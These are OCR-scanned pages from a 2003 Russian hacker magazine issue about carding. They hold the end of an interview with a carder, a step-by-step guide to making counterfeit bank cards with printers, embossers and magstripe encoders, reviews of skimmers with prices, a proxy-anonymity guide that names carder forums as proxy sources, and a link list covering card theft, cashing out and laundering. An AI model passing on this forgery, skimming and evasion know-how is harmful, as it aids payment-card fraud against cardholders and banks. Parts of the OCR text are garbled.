проблема - нужно 
лишь иметь аккаунт 
на сайте, либо знать 
стоящих людей, ко- 
торые всегда подки- 
нут тебе мегабайто- 
вый листик прокси- 
серверов ;). » 
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2) Буржуин? Разве 
дропы не из Рос- 
сии? 


Нет. Как раз наобо- 
рот. Дропы, как пра- 
вило, живут в USA и 
других странах. На- 
ши ушлые предста- 
вители могут кинуть 
кардера, как два 
байта переслать. По- 
этому, если хочешь, 
чтобы твой бизнес 
процветал - учи 
иностранный язык, 
он тебе весьма при- 
годится ;). 


© Как гласит народная 

мудрость - главное 
вовремя остановиться. 
Актуально ли это для 
кардера? 


Несомненно! Ловят 
именно из-за того, 
что кардер перегиба- 
ет палку. Сначала он 
не может нарадо- 
ваться $1000, а по- 
том ему становится 
мало $50000. В ито- 
ге, после очередной 
крупной сделки - 
плачевный итог. Поэ- 


тому не стоит жадни- 
чать, и тогда все бу- 
дет ок. 


2) Неплохо! Признать- 
ся, даже мне захо- 

телось заняться таким 

прибыльным делом ;). 


Не все так просто. За 
такие деньги и проб- 
лем себе можешь 
нажить. В Сети су- 
ществовали и будут 
существовать кры- 
сы, которые так и но- 
ровят кинуть честно- 
го кардера на бабки. 
Я говорю в основном 
о дропах, они не 
всегда честный на- 
род. Хотя может ки- 
нуть кто угодно - 
продавец картона, 
проксиков и даже 
вбивальщик. Я уже 
ничему не удивлюсь. 


© А как определить, 
что тебя собирают- 

ся кинуть? Или наверня- 

ка сказать невозможно? 


Конечно, никак. Как 
и в реальной жизни, 
человек не знает, кто 
его может кинуть ;). 
Это человеческий 
фактор. Как правило, 
кидалы заносятся в 
черный список, кото- 
рый просматривается 
всеми кардерами. В 
нем можно найти ник, 
аську и координаты 
дропа (хотя, что ме- 
шает чуваку сменить 
НИК?). Для этого, пе- 
ред приемом на рабо- 
ту, у чувака просят 
скан паспорта. Эту 
процедуру проводят 
также для устраше- 
ния - человек дваж- 
ды подумает насчет 
кидалова, если его 
попросят отсканиро- 
вать документ. 
Забавно, но кардеры 
сами иногда кидают 
дропов. Обещают им 
золотые горы, а за- 
тем забивают на них 
по полной. При этом 
наивный буржуин 
даже не способен от- 
ветить на кидалово. 


2) Какие ресурсы ты 
бы посоветовал 


для изучения кардерс- 
кого мастерства? 
Есть ли такие вообще? 


На 
этом сайте есть все, 
что касается кардин- 
га, не побоюсь этого 
слова. Там можно 
найти замечательные 
статьи, форум, где 
ежедневно обсужда- 
ются проблемы кар- 
динга, а также листы 
доверенных кардеров 
и кидал. Эта инфор- 
мация весьма полез- 
на. Что примечатель- 
но, по кардингу пи- 
шут только в России 
и ближних странах 
СНГ. Это связано с 
тем, что за границей 
немного другие зако- 
ны, поэтому кардер- 
ство там не прижи- 


Лось. 


На этой оптимисти- 

ческой ноте и завер- 
шим наше интервью. И 
последний вопрос: что бы 
ты хотел пожелать чита- 
телем журнала? Выбрать 
легкий, на первый взгляд, 
способ заработать на 
жизнь или не рисковать? 


Этот путь далеко не 
легкий. Если кто при- 
вык воровать, то та- 
кая работа ему будет 
по душе. А когда 
жизнь только начи- 
нается, мой тебе со- 
вет - не лезь в это 


грязное дело, а зара- 
ботай в другом месте. 
На худой конец, будь 
просто вбивальщи- 
ком, не больше. 


Спасибо за замеча- 
тельные ответы. Я ду- 
маю, теперь читатель 
поймет, что кардер- 
ство - действительно 
опасный бизнес, хотя 
и довольно прибыль- 
ный. От себя замечу, 
что я полностью сог- 
ласен с автором - если 
тебе чуждо воровство, 
не стоит заниматься 
этим делом. Нажи- 
вешь меньше проблем 
на свою пятую точку. 


Теперь ты понима- 
ешь всю сложность 
бизнеса кардера. На- 
чать и поддерживать 
свое дело очень 
сложно. Постоянно 
приходится сотрудни- 
чать с разными людь- 
ми и сталкиваться с 
кидалами. Но, несмот- 
ря на это, кардинг 
процветает и будет 
популярен до тех 
пор, пока не введут 
новые законы, кото- 
рые будут жестоко 
пресекать подобную 


деятельность. 


www.rambler.ru 


Rambler 
рядом 


СДЕЛАЙ КРЕД 


ИТКУ СВОИМИ РУКАМИ | 


Дмитриев Ярослав (clane@real.xakep.ru, ICQ 167921895, www.sources.ru) 


СДЕЛАЙ КРЕДИТКУ 
СВОИМИ РУКАМИ 


ЧТО НУЖ- 


ПРОИЗВО- 


= 


Купить 
пластик 
сейчас не 
проблема. 
Покупать 
стоит белый 
пластик, 
это позво- 
лит сэконо- 
мить на 
краске для 
принтера. 


—= 


Энкодеры 
умеют за- 
писывать 
два вида 
карт - high 
и low соег- 
civity. По 
сути, это 
высокая и 
низкая на- 
магничен- 
ность. Име- 
ет смысл 
купить эн- 
кодер, по- 
нимающий 
любые кар- 
ты. 


ДСТВА 

КАРТ 
m Все начинается с исход- 
ного материала, собственно, 
подложки любой карточки. 
В народе для простоты на- 
зывается пластиком или 
картоном. Купить пластик 
нужного размера с вклеен- 
ной магнитной полосой сей- 
час не проблема. Покупать 
стоит белый пластик, это 
позволит сэкономить на 
краске для принтера. 


Чтобы из купленного 
пластика сделать полноцен- 
ную карту, тебе придется 
помучиться со специальным 
оборудованием. Начинается 
все, как ты понимаешь, с 
печати изображений на 
карте. Для небольших тира- 
жей (go 1000 штук) исполь- 
зуется метод сублимацион- 
ной печати. 


Чтобы получить качест- 
венное изображение, кото- 
рое не стыдно продемон- 
стрировать своей девчонке 
или сокурсникам, тебе по- 
надобится специальный 
принтер для печати на 
пластиковых картах. При 
выборе принтера надо вни- 
мательно изучить его ха- 
рактеристики. Принтеры де- 
лятся на следующие груп- 
пы: монохромные и полноц- 
ветные, односторонние и 
двухсторонние (на двухсто- 
роннем можно печатать 
сразу обе стороны за один 
проход). Большинство 
принтеров имеют встроен- 
ные или опциональные (с 
возможностью докупить 
нужный блок) дополнитель- 
ные функции: ламинатор, 
энкодер, эмбоссер, типпер, 
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ОБОРУДОВАНИЕ ДЛЯ КАРДЕРА 


а также устройство для 
вклеивания голограммы и 
полосы подписи. 


С последней функцией бо- 
лее или менее ясно, расска- 
жу про остальные. Ламина- 
тор требуется для того, что- 
бы после печати покрыть 
изображение специальной 
защитной пленкой, этот 
несложный процесс назы- 
вается ламинацией. Энко- 
дер поможет тебе записать 
дамп на магнитную карту, 
эмбоссер выдавит инициа- 
лы и "секретную" комбина- 
цию цифр прямо на карте, а 
типпер (не путай с триппе- 
ром) окрасит эмбоссирован- 
ные символы. 


Р РРР AR 


ТЕХНОЛОГИЯ 

no ШАГАМ 

и Для изготовления полно- 
ценной карты надо реализо- 
вать несколько нехитрых 
операций: 

- печать изображений на 
обеих сторонах карты; 

- ламинация; 

- эмбоссирование; 

- ТИППИНГ; 

- вклейка голограммы и по- 
лосы подписи; 

- запись информации на 
магнитную ленту с по- 
мощью типпера. 


СОВЕТЫ БЫВАЛОГО 

м С принтером все просто 
- главное, чтобы его разре- 
шение было не менее 
300dpi, он мог печатать без 
полей и не отрыгивал карты 
толщиной 0,75 миллиметра. 


Если принтер не соответ- 
ствует хотя бы одному из 
перечисленных параметров, 
забудь о его существова- 
нии. 


Не помешает поинтересо- 
ваться стоимостью pacxog- 
ных материалов, так как 
впоследствии это может вы- 
литься в забавную сумму. 
Помимо стоимости, необхо- 
димо также поинтересо- 
ваться доступностью этих 
материалов, чтобы не ле- 
тать потом за ними в Афри- 
ку. Понятно, что попате 
всегда дешевле, но все же 
советую приобретать обо- 
рудование известных фирм. 
Лидеры в производстве 
сублимационных и термот- 
рансферных принтеров - 
это Eltron и Fargo. Покупать 
только оригинальные (чи- 
тай - родные) расходные ма- 
териалы или нет - дело вку- 
са, но с родными качество 
гарантировано. 


С эмбоссерами вообще 
элементарно. Здесь получа- 
емое качество практически 
одинаково для всех моде- 
лей, цена зависит лишь от 
производительности и 
бренда. Самый простой - это 
ручной эмбоссер, не требу- 
ет электропитания и прост в 
обращении. 

При покупке типпера, так 
же, как в случае с принте- 
ром, уточни стоимость и 
доступность фольги именно 
для этой модели. А отдель- 
ный ламинатор вообще не 
нужен, проще купить прин- 
тер или эмбоссер со встро- 
енным ламинатором. От- 
дельно ламинатор обойдет- 
ся дороже, а времени на из- 
готовление одной карты уй- 
дет больше. 


чек 


Энкодеры умеют записы- 
вать два вида карт - high и 
low coercivity. По сути, это 
высокая и низкая намагни- 
ченность. Имеет смысл ку- 
пить энкодер, понимающий 
любые карты. И отдельное 
замечание по поводу тра- 
ков - не гонись за энкоде- 
ром, который записывает 
все три трака (магнитная 
полоса имеет три области, 


называемые траками). Тре- 
тий трак не читается прак- 
тически ни одним ПОС-тер- 
миналом и уж тем более 
банкоматами. Так стоит ли 
переплачивать за беспо- 
лезную навороченность? 
Такой энкодер может пона- 
добиться лишь для выпуска 
кредитных карт, дающих 
владельцам определенные 
скидки. 


СКИМЕРЫ (РИДЕРЫ) 


mw Название модели: 
TA-32 (скимер) 


| 
и Память: 512 Кб (около 3000 
дампов) 

Траки: считывает 1, 2, 3 

и Питание: встроенная литиевая 
батарея, 50 часов беспрерывной 
работы 

и Подключение: USB 

и Размеры: 8,25x2,03x2,67 см 

и Все: 49 граммов 

m Цена: 1200 зеленых 


в Описание: этот ридер от- 
личается хорошей работос- 
пособностью, позволяет на 
лету считывать карты лю- 
бой толщины и с любой 
плотностью записи. Позво- 
ляет считывать в обе сторо- 
ны и с любой скорость. Тер- 
моустойчив, работает при 
температуре от O go 60 гра- 
дусов. В комплекте идет 
программное обеспечение. 
Корпус сделан из суперп- 
рочного пластика ABS, спе- 
циально gna тех, у Koro тря- 
сутся руки. 


mw Название модели: 

РМК-202 (скимер) 

и Память: 

128 Кб (около 1000 дампов) 

и Траки: считывает 1, 2 

и Питание: встроенная литиевая 
батарея, 50 часов беспрерывной 
работы 

ш Подключение: USB 

ш Размеры: 4,6x3x3,08 см 

и Вес: 54 грамма 

и Цена: 1190 зеленых 

mw Описание: из фишек этого 
скимера можно отметить ав- 
томатическое отключение 
питания при долгом прос- 
тое, защиту от нежелатель- 
ных пользователей (защита 
паролем от несанкциониро- 
ванного доступа). В комп- 
лекте идет ПО для работы 
со скимером. 


————"- = 
~~ a <a | 
tp — 
и Название модели: 
АМС-772 (энкодер) 
и Траки: 


записывает и считывает 1, 2 

и Подключение: USB 

и Вес: 1,33 кг 

и Цена: 1000 зеленых 

m Описание: один их самых 
надежных, а следователь- 


ГДЕ КУПИТЬ 
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но, популярных энкодеров. 
Подключается к USB, что 
актуально в последнее вре- 
мя. Жизнеспособность маг- 
нитной головки составляет 
около миллиона проводок, 
тебе этого хватит и еще ос- 
танется детям. В наборе 
идет стандартное ПО. 


и Название модели: 

и Matica 71 (эмбоссер) 

и Размеры: 43x40x17 см 

и Вес: 17 кг 

m Цена: 4700 зеленых 

в Описание: идеальное ре- 
шение, проверенное време- 
нем. Компактность, прият- 
ный дизайн, небольшие 
размеры и тихая работа. 271 
имеет автоматическую заг- 
рузку карт (на выходе гото- 
вые карты помещаются в 
выходной лоток для макси- 
мальной экономии простра- 
нства), внутреннюю систему 
диагностики и ЖК-дисплей, 
обеспечивающий непре- 
рывный контроль работы. 
Рекомендуемая производи- 
тельность: 300-500 карт в 
день. Совместим с окошка- 
ми, подключение через 
USB. 


mw Название модели: Matica Z 

и Tipper (типпер) 

mw Размеры: 25x25x20 см 

и Вес: 3 кг 

m Цена: 1990 зеленых 

в Описание: Matica 7 типпер 
- одиночное устройство для 
окрашивания эмбоссиро- 
ванных карт (точнее выдав- 


ленных символов на них). 
Чрезвычайно компактные 
размеры позволяют устано- 
вить девайс в любое место. 
Очень прост в работе, зада- 
ется необходимая темпера- 
тура и прижим для получе- 
ния идеального результата. 
Жидкокристаллический 
дисплей, которым оснащен 
этот типпер, показывает те- 
кущее состояние машины и 
температуру. Кроме того, 
функция энергосбережения 
приводит к пониженному 
потреблению энергии при 
простое машины в режиме 
ожидания. Лента для окра- 
шивания может быть раз- 
личного цвета. Установка и 
замена картриджа для заг- 
рузки ленты производится 
элементарно. Скорость ок- 
рашивания составляет все- 
го несколько секунд на од- 


ну карту! 


‘ 


и Название модели: 

шЕ{гоп P210i (принтер) 

mw Размеры: 12,5х17х24 см 

и Все: 3 кг 

m Цена: 2195 зеленых 

в Описание: Eltron P210i 
может использоваться для 
печати удостоверений, 
предпечатных карт в цвете 
или монохромно. Годится 
для односторонней печати 
без полей. Штампует вели- 
колепного качества карты 
с разрешением 300 dpi, 
позволяет наносить штрих- 
коды, фотографии, графи- 
ку или текст. Тихий в рабо- 
те, маленький и легкий. 
Есть модификация с коди- 
ровщиком магнитной поло- 
сы. P210i поставляется с 
двойным интерфейсом для 
простоты интеграции в лю- 
бой системе: USB и Parallel, 
либо USB и Serial. 


ГДЕ ПОЧИТАТЬ 
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B ПРОДАЖЕ 
С 21 ОКТЯБРЯ 


Магические телефонные 
превращения 


— Легким движением руки превращаем 
Siemens А55 в C55 


— Залей через меня Троян! 


Шпионская компьютерная 
тайнопись 


— Что ты должен знать о стеганографии 


Оживление Windows ХР 


— Все секреты System Restore 


Где стать хакером 


— Обзор лучших сайтов для 
начинающих взломщиков 


Лазерная терапия 


— Восстановление данных на нечитаемых СО 


Сколько плюсов у С++? 


— Обзор возможностей для 
сомневающихся 


Виртуальная реальность 


— Пресловутая "матрица" появилась 
задолго до братьев Вачовски 


На нашем СО ты найдешь весь софт 
из журнала, кучу полезных утилит, 
включая Macromedia suite МХ и 
Sound Forge 7.0, обновления 
антивирусных баз, демки, музыку, X— 
обои и многое другое! 


(game) ane 


www.xakep.ru 


АНОНИМНОСТЬ ПРЕЖДЕ ВСЕГО ) 


Дмитриев Ярослав (clane@real.xakep.ru, ICQ 167921895, www.sources.ru) 


АНОНИМНОСТЬ 
ПРЕЖДЕ ВСЕГО 


СОФТ НА ВСЕ СЛУЧАИ ЖИЗНИ 


ш Все типы 


Все типы 


ргоху-сер- 
веров обыч- 
но делят на 
три катего- 
рии: шлю- 
зы, кеширу- 
юшие и 
анонимные 
ргоху-сер- 
вера. 


Анонимные 


прокси поз- 
воляют 
скрыть свой 
подлинный 
IP-agpec 
при манипу- 
ляциях в 
инете и при 
повседнев- 
ном прос- 
мотре веб- 
страниц, за- 
качке софта 
и т.п. 


ргоху-серве- 
ров обычно 
делят на три категории: 
шлюзы, кешируюшие и 
анонимные ргоху-серверы. 


Шлюзы чаще всего ис- 
пользуются администрато- 
рами локальных сетей. Не 
давать же каждому пользо- 
вателю "персональный" вы- 
ход в глобальную сеть, вот 
и устанавливают прокси- 
сервер, чтобы удовлетво- 
рить за раз множество 
пользователей :). Но отсюда 
и своя особенность - ни 
один внешний узел сети не 
может установить соедине- 
ние с клиентом, так как 
ргоху-сервер не понимает, 
кому из пользователей 
предназначен этот запрос. 
И поэтому при работе со 
шлюзом возможен только 
один тип соединения - от 
клиента к серверу. 


Админы таким образом ог- 
раничивают пользователей 
- множество программ (к 
примеру, ICQ) не будут ра- 
ботать, так как требуют 
двухсторонней установки 
соединения. Зато огромный 
плюс - повышенная безо- 
пасность. 


Второй тип ргоху-серве- 
ров - кешируюший. Его ис- 
пользование (доброволь- 
ное) значительно ускоряет 
загрузку страниц, особенно 
при соединении с сильно 
перегруженными серверами 
либо на плохой линии. Идея 
ясна - сервер сохраняет лю- 
бые получаемые данные на 
своем диске (в кеше), и ес- 
ли запрошенный клиентом 
ресурс уже находится в ке- 


ХАКЕРСПЕЦ | 09(34) | 2003 


ше, он "отдается" уже без 
обращения к удаленному 
серверу. Схема не подходит 
для часто обновляющихся 
ресурсов, но "умные" кеши- 
руюшие прокси-серверы 
умеют с течением времени 
заново обращаться к уда- 
ленным серверам, прове- 
рять ресурс на наличие из- 
менений и, соответственно, 
обновлять свой кеш. 


Последний тип прокси- 
серверов - анонимные. Они 
отправляют запрос на полу- 
чение данных от своего 
имени, не разглашая при 
этом |Р пользователя. Они- 
то тебе и нужны. 


ЗАЧЕМ ЭТО НУЖНО 

и Анонимные прокси поз- 
воляют скрыть свой под- 
линный |P-agpec при мани- 
пуляциях в инете и при пов- 
седневном просмотре веб- 
страниц, закачке софта и 
т.п. К тому же большинство 
программ (IE, Opera, ICQ, 
Reget) умеют работать с 
прокси-серверами. Польза 
от использования этой 
связки несомненна - никто 
и никогда не узнает твой 
истинный IP-agpec, что по- 
может избежать кары не- 
бесной, а также отрезать 
всевозможные атаки извне 
на твой компьютер. 


ИЩЕМ ПРОКСИ- 
СЕРВЕРЫ 

и Ищут прокси-серверы 
двумя методами: в поиско- 
виках или через специаль- 
ный сост. Самый простой и 
распространенный поиск - 
по-дедовски, в популярных 
поисковых системах, типа 
www.rambler.ru, 
www.google.com, 
www.yahoo.com и т.д. Захо- 
дишь на любой из них и 


Ищем прокси с помощью 
Andex.ru 


вводишь "прокси" + "лист". 
Результат перед глазами: 
куча ссылок, разгребать ко- 
торые можно всю жизнь 
(при наличии свободного 
времени), причем велика 
вероятность получения би- 
тых ссылок. 


Большая часть полу- 

ченных результатов - 
прокси-серверы, не при- 
годные для использования. 
Ввиду популярности мето- 
да большинство прокси - 
"дохлые", их скорость ос- 
тавляет желать лучшего. 


Другой метод заключает- 
ся в использовании софта, 
который специально зато- 
чен под поиск прокси в ине- 
те. Одна из подобных прог- 
рамм - Proxy Hunter. Все 
что от тебя требуется, это 
ввести диапазон IP-agpecoB 
для проверки, остальное 


о саазша 


-— = — 
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Главное окно Proxy Hunter 


программа сделает сама. 
Интуитивно понятный ин- 
терфейс, простота в ис- 
пользовании, легкость в 
настройке и еще множество 
полезных функций - все это 
о Proxy Hunter. 


Ha Фашр'е придется 
изрядно подождать :(. 


ПРОВЕРКА ПРОКСИ НА 
АНОНИМНОСТЬ 

m Собственно, самое глав- 
ное - не найти анонимный 
прокси, а убедиться, что он 
действительно анонимен. 
Иначе доказывай потом в 
отдаленных местах, что ты 
не жираф? (УК РФ читал?). 


И снова варианты. Первый 
- опять же через веб-ресур- 
сы, а второй - софтина 
Proxy Checker. Скачиваешь, 
устанавливаешь, и 
ProxyChecker готов к рабо- 
те. Для простоты работы 
программе можно отдать на 
съедение запрос "IP:port", 
после чего можно откинут- 
ся на спинку кресла и, по- 
пивая горячий чаек, ожи- 
дать результатов работы. 
Программа умная и может 
параллельно обрабатывать 
несколько запросов и go- 
жидаться коннекта при оче- 
редном разрыве связи (диа- 
лапщики меня поймут). 
Удобно, что при проверке 
прокси на анонимность ря- 
дом с проверенными канди- 
датами указывается их ско- 
рость работы. В общем, зо- 
лото, а не программа. Для 
комфортной работы требу- 
ется зарегистрировать 


_Чекаем без проблем 


программу, иначе она прек- 
ратит действовать по исте- 
чении 7 дней либо после 50 
запусков. 


НАСАЖИВАЕМ БРАУ- 
ЗЕР НА ПРОКСИ 

m Настройка любого брау- 
зера для работы с прокси 
во многом одна и та же, поэ- 
тому покажу на примере по- 
пулярного браузера от ком- 
пании Microsoft nog скром- 
ным названием Internet 
Explorer. 


азии | 
| r= = в 
+ =. 
| | — — 

. 

| — 

== 

ks Речи 


В меню "Сервис" выбери 
пункт "Свойство обозревателя". 


В открывшемся диалого- 
вом окне перейди к заклад- 
ке "Подключение". 


Нажми кнопку "Настройка 
локальной сети", затем от- 
меть CheckBox "Использо- 
вать прокси-сервер" ив 
строке "Адрес" введи 1Р-ад- 
рес прокси, а в строке 
"Порт" - соответственно 
порт (обычно 80 или 8080). 


Вот и все, непосильный 
процесс настройки закончен. 


ГДЕ МОЖНО КУПИТЬ ПРОКСИ 


Ш www.mazafaka.ru 


Ш www.forum.carderplanet.net 


ФОРУМЫ ПО БЕЗОПАСНОСТИ 


Mwww.pascal.sources.ru/cgi- 
bin/forum/YaBB.cgi?board=security 
Ш www.uinc.ru/forum/index.shtml 


@ www.bugtrag.ru/forum 


Ш www.securitylab.ru 


РЕСУРСЫ CO СПИСКАМИ ПРОКСИ 


Ш www.proxychecker.ru 
Ш www.samair.ru/proxy 


Ш www.mazafaka.ru/proxy 


ПРОВЕРКА ПРОКСИ НА АНОНИМНОСТЬ 


Ш www.all-nettools.com/toolsi.htm 

Ш www.leader.ru/secure 

Ш www.checker.freeproxy.ru/checker 

Ш www.shadowsecurity.net.ua/r/checking2.shtml 
Ш www.antichat.ru/proxy 


_ SurfNow Professional a 
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софт 

и Софта существует бо- 
лее чем достаточно, остано- 
вимся на двух проверенных 
экземплярах: SurfNow 
Professional и Anonymity 4 
Proxy. 


www.loomsoft.com 


(интерфейс английский, 
весит -940 Кб) 


При первом запуске прог- 
рамма просто очаровывает 
юзера - верх эстетики. Глав- 
ная фишка шароварки - сис- 
тема поиска новых прокси. 
Теперь тебе не нужно мучи- 
тельно ходить на security- 
сайты, чтобы увести из-под 
носа товарища еще не 
"юзанную" прокси. Зиг Мом 
все сделает за тебя (жалко, 
штаны не гладит и обед He го- 
товит - прим. peg.). Программа 
доставляет удовольствие тре- 
мя способами: искать прокси 
с помощью google, вытащить 
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список из заданного файла 
или, наконец, "пропарсить" 
определенный url Ha предмет 
|Р-адресов. 


Чтобы удостовериться, что 
прокси не "умерли", сосртина 
сразу проверяет их на аноним- 
ность, что, согласись, очень 
удобно. Также разработчики 
не позабыли и столь нужные 
фичи, как смена прокси "на 
лету", возможность добавле- 
ния в список проверенных 
бойцов и т.д. У программы есть 
ОДИН недостаток - это плат- 
ность, обратись в асталависту. 


www.inetprivacy.com/a4proxy 


(интерфейс английский, 
весит ~1077 Кб) 


Этот "комбайн" появился 
давно, но постоянно обновля- 
ется, с каждой версией стано- 
вясь все привлекательнее. 
Возможности аналогичны 
SurfNow, так что выбирай сам. 


МУЧИТЕЛЬНЫЙ КОНЕЦ 
ш Читай на ночь УК РФ и 
всегда заботься о своей бе- 

зопасности (не только в 


инете). 


Ищут прок- 
си-серверы 
двум мето- 
дами: в по- 
исковиках 
или через 
специаль- 
ный софт. 
Самый 
простой и 
распростра- 
ненный по- 
иск - по-де- 
довски, в 
популярных 
поисковых 
системах, 
типа 
www.ram- 
bler.ru, 
www.google. 
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Елманов Олег (SpyDr@comail.ru) 


КТО ПРЕДУПРЕЖДЕН - 
ТОТ ВООРУЖЕН 


КАРДЕРСКИЕ ЛИНКИ В ИНЕТЕ 


295255 


ДЛЯ НОВИЧКОВ 
HTTP://6DICO.BY.RU/STAT.HTM) 


На сайте ты найдешь инорорма- 

цию о кардинге, подробнее смо- 
жешь познакомиться с некоторыми ви- 
дами мошенничества в интернете. Есть 
инфра по работе с кредами, описаны не- 
которые способы зарабатывания денег 
сомнительными методами. Хорошо из- 
ложены технологии работы кредитных 
карточек - путь от банка до владельца, a 
также механизмы электронных продаж. 


Для дальнейшего погружения смот- 
ри http://alldlya.narod.ru/aaa_karding.htm. 
Здесь найдешь статьи по кардингу и 
здоровенный ГАО. Хорошо раскрыта 
тема получения кред - описаны все- 
возможные способы, от простейших 
gO экзотичных. Заодно узнаешь, как в 
дальнейшем ими по-умному распоря- 
диться - основы обнала, отмывание ба- 
бок и многое другое. 


ТЕРРИТОРИЯ БЕЗОПАСНОСТИ 
(HTTP://INF.TU-CHEL.AC.RU/ 
~TYRTY/INDEX1.HTML) 


Довольно познавательный pe- 

сурс из области защиты информа- 
ции. Здесь можно найти интересную ин- 
фу по промышленному шпионажу - для 
чего и как применяется, описаны спосо- 
бы добычи и перехвата конфиденциаль- 
ной информации. Заинтересует и боль- 
шое количество информации о безопас- 
ности в интернете - как быть анонимным 
в Сети, можно ли заиметь бесплатный 
интернет и как, какие данные можно 
достать с компьютера. Представлена ин- 
тересная статья про тайники - как в 
электронном мире, так и в оффлайне. 


Естественно, вся информация предос- 
тавлена с целью недопущения проти- 
воправных действий со стороны не- 
сознательной части человечества :). 


ХАКЕРСПЕЦ | 09(34) | 2003 


Для чего размещен довольно обшир- 
ный раздел с законами РФ. 

В аспекте защиты информации весь- 
ма интересным будет сайт 
www.razvedka.ru, на котором ты сможешь 
найти информацию по таким вопро- 
сам, как физическая и программная 
защита информации от несанкциони- 
рованного доступа к ней и перехвата 
всевозможными средствами. 


Также интересен ресурс мили легройсе.тиг- 
mansk.ru - сайт сетевой безопасности. 
Здесь есть неплохая подборочка статей 
о безопасности на бескрайних просто- 
рах интернета и при использовании 
современной электроники, например, 
сотовых телефонов. Кроме того, BbINO- 
жен неплохой архив сосфта для обеспе- 
чения безопасности во время полетов 
по онлайн-просторам. 


ПЛАТЕЖНЫЕ СИСТЕМЫ 
(WWW.JOIN2DAY. ~ANNA/PSYS 


Неплохая подборка статей по 

платежным системам. Почерп- 
нешь инофу о платежных системах, он- 
лайн-платежах. Описаны перспективы 
развития электронных платежей, есть 
любопытная инфа по MLM и финансо- 
вым пирамидам. 


Не стоит забывать, что в официаль- 
ных источниках также можно найти 
интересную и полезную информацию. 
Список наиболее распространенных 
платежных систем рунета с краткими 
анонсами можешь посмотреть по ад- 
ресу http://efinance.report.ru/ 
_5FolderlD_2284 html. 


Весьма интересный и полезный 

ресурс, посвященный вопросам 
электронной коммерции и банковской 
деятельности. Посетив его, получишь 
море инорормации об уязвимостях 
банковских систем, технологии работы 
торговых площадок в интернете, 
смарт-картах и кардинге. В файловом 
архиве расположена неплохая под- 
борка интересных программ по кар- 
дингу. Здесь же находится большой 
форум (http://forum.carderplanet.net/), где 
можно найти ответы почти на все воп- 
росы из области кардинга, защиты ин- 
формации и т.п. 


В качестве дополнительной литерату- 
ры советую Www.mazafaka.ru/articlez, 
Тут валяется интересненьксе - как зав- 
ладеть чужими кредитками, знаком- 
ство с вещевым кардингом, другие ви- 
ды мошенничества в интернете. 


Посети cpopym по адресу 
http://eraser.hostmos.ru/cgi-bin/ikonboard/ikon- 
board.cgi, на нем представлен большой 
раздел по кардингу, найдешь иноу по 
платежным системам, казино, аукцио- 
нам, взлому электронных магазинов и 
многое другое. 


Кстати, наиболее ценная и оперативная 
информация в основном находится на 
различных форумах. По мере устарева- 
ния она перебирается в новости различ- 
ных сайтов, а потом оседает в статьях. 
Там же (в форумах) ты сможешь выйти 
на живого человека, пообщаться с ним 
и узнать интересную и полезную инфу 
из первых рук. WWW.xakepy.ru/index.php - 
здесь найдешь раздел про кардинг, раз- 
gen халявы - богатые кардеры и хакеры 
делятся своими кредами, асями и други- 
ми интересными сфишками. 


ФРИКИНГ 
(WWW.HACKERSRUSSIA.RU) 


Созданный как некоммерческий 

интернациональный проект, сайт 
предоставляет инсрормацию по элект- 
ронике, телефонной связи, дфрикингу и 
кардингу. На нем можно почерпнуть по- 
лезные сведения по телесронии - найти 
всевозможные протоколы, алгоритмы 
работы, прошивки, документацию и схе- 
мы работы АОНов, АТС и даже МГТС! 


Поражает раздел, посвященный теле- 
CPOHHbIM смарт-картам. Здесь ты най- 
дешь, наверное, самую обширную ин- 
формацию по телефонным карточкам 
различных систем - с чипами, бесконтакт- 
ных, магнитных. Представлены схемы, ал- 
горитмы работы, программы для прошив- 
ки, перепрошивки, перезаписи, различ- 
ные эмуляторы. Также стоит обратить 
внимание на разделы, посвященные со- 
товой связи и транковым системам. 


В качестве дополнения стоит посетить 
страничку http://hackeru.chat.ru/pheaking.htm, 
на которой можно найти неплохую 
подборку документов и программ по 


ффрикингу. 


Неплохой ресурс располагается по ag- 
ресу www.digital-laboratory.de. Здесь ты най- 


дешь перечень всего оборудования, 
которое необходимо для фрикинга, мо- 
ре программ по программированию ра- 
диоприемников, радиотелефонов, де- 
кодированию радиосигналов. Весьма 
интересен раздел по GSM-TeneqooHam: 
прошивки, программы, схемы, кряки. 
Раздел смарт-карт представлен эмуля- 
торами, схемами, описаниями микроко- 
нтроллеров и принципов работы. 


Весьма интересен сфидошный форум 
RU.PHREAKS, на который можно по- 
пасть по адресу 
http://ftn.pp.ru/fido7.ruphreaks. Также стоит 
обратить внимание на форум 
http://forum.web-hack.ru. 


БАНКОВСКИЕ КАРТОЧКИ 
(WWW.CREDCARD.RU) 


Здесь ты узнаешь все о банковс- 

ких карточках, почерпнешь сведе- 
ния об истории их возникновения, озна- 
комишься с современным состоянием 
gen на рынке банковских карт. Есть ффо- 
рум, на котором ты можешь задать свои 
самые сокровенные :) вопросы, боль- 
шая подборка тематических статей для 
держателей банковских карт. В разделе 
"Интернет-платежи" имеется большой 
список платежных систем российского 
происхождения - найдешь по вкусу. 
В качестве дополнения советую ресурс 
www.creditcards.md/whatisit/index.html. 


По адресу www.cardingworld.com/articles.html 
ты узнаешь о том, как защитить кар- 
точку от взлома, ну и, собственно, как 
ее можно взломать :). 


СМАРТ-КАРТЫ 


Стоит посетить страничку П!р.// 
BY kunegin.narod.ru/ref3/sc5/index.htm, Ha 
которой весьма подробно описывают- 
ся банковские смарт-карты - устрой- 
ство, использование, защита, способы 
взлома. Заодно здесь можно узнать, 
например, как взломать банкомат. 


А по адресу 
www.isbc.ru/smartcard/sc_about.html представ- 


лена уже более серьезная инфрорма- 
ция по смарт-картам. Здесь можно най- 
ти различную документацию и техни- 
ческие спецификации для смарт-карт 
различных производителей и даже 
приобрести Smart Cart Development Kit, 
включающий в себя исчерпывающую 
информацию по программированию 
смарт-карт, а также различные устрой- 
ства для работы с ними. 


Без знания основ построения 

площадок электронной коммер- 
ции ты не сможешь грамотно зани- 
маться вопросами защиты информа- 
ции, так как не будешь знать всю це- 
почку работы таких систем и, соответ- 
ственно, их слабые стороны. Короче, 
этот ресурс все компенсирует, на нем 
рассмотрены аспекты ведения элект- 
ронного бизнеса, описаны структура и 
технологии для построения интернет- 
площадок торговли и коммерции. 


Если, прочитав этот номер, ты всерьез 
решил заняться контролем безопас- 
ности электронных магазинов, тебе по- 
может словарь по электронному биз- 
несу - www.vadimeidlin.com/e-dictionary.htm. 


ЗАЩИТА И НАПАДЕНИЕ 
(HTTP://SECURITYLAB.RU) 


Здесь ты повысишь свой уровень 

знаний в вопросах обеспечения 
безопасности электронных магазинов, 
каталогов и просто сайтов. Узнаешь 
последние новости в сфере П-безопас- 
ности, познакомишься с последними 
уязвимостями интернет-приложений. 


